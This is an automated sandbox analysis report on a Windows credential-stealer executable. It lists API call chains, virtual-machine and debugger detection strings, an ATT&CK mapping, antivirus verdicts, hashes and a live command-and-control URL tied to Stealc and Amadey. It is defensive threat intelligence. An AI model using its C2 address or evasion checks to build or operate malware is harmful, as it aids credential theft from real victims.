Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess
Source: file.exe, file.exe, 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.2253123340.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000002.2253123340.0000000000F93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-25926)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-26073)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-26080)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-25945)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00394A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B6390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6620, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B2D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6620, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6620, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the count shown next to that technique in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (13); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus Detection

Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.php/= | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phplP | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phptop | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpjG | 100% | Avira URL Cloud | malware

No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/= | file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpjG | file.exe, 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000001.00000002.2253123340.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/X | file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phplP | file.exe, 00000001.00000002.2253123340.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/u | file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phptop | file.exe, 00000001.00000002.2253123340.0000000000F83000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559586
Start date and time: 2024-11-20 17:40:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 122
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 20.234.120.54
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, ris-prod.trafficmanager.net, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                            No simulations
                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                           185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                           185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
                            No context
                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                           WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
                           WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
                           WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                           WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                           WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                           WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
                           WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
                           WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                           WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                           WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.944416064399235
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'753'088 bytes
                            MD5:73da003f0368f871f2bd1b9b2e0ec575
                            SHA1:771136fb463501015f73f5cacbec4b5a7c93be18
                            SHA256:1f4d60eb730020737ff8fbcbff87fb5227003745d875b6b4965bd5cac4925576
                            SHA512:d9373d57d285c82430468001da2d23617741af36cc87bb15a0aebb648a79a8328aec3ab5ba49f63fe0eb4d9d2f2f9704678a7b261feb3d641016e16726088bbd
                            SSDEEP:49152:kjPgnnYsS4/+uXUXhoHwIIG9A8sCdfmDP:kjPgnPhWMRhIGrskf
                            TLSH:5F853351A7B69E80C2E04CB4D3A3C79E2A009506D7C65098B86B413EEAF23FA7571D1B
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xa76000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                           Name | Virtual Address | Virtual Size | Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                           (unnamed) | 0x1000 | 0x249000 | 0x16200 | 67ff32e9ad520c97597930ee7a216716 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           .rsrc | 0x24a000 | 0x1ac | 0x200 | 4e16f9e62c3c82c4588487f17de895a8 | False | 0.58203125 | data | 4.555841354752362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           (unnamed) | 0x24c000 | 0x296000 | 0x200 | d3295095dc09f7f5ef2abaa41ac8b43b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           nflvzldk | 0x4e2000 | 0x193000 | 0x192200 | 9f121f2f46c9ba0e3106d636c7727723 | False | 0.9946585036524712 | data | 7.9535417712183945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
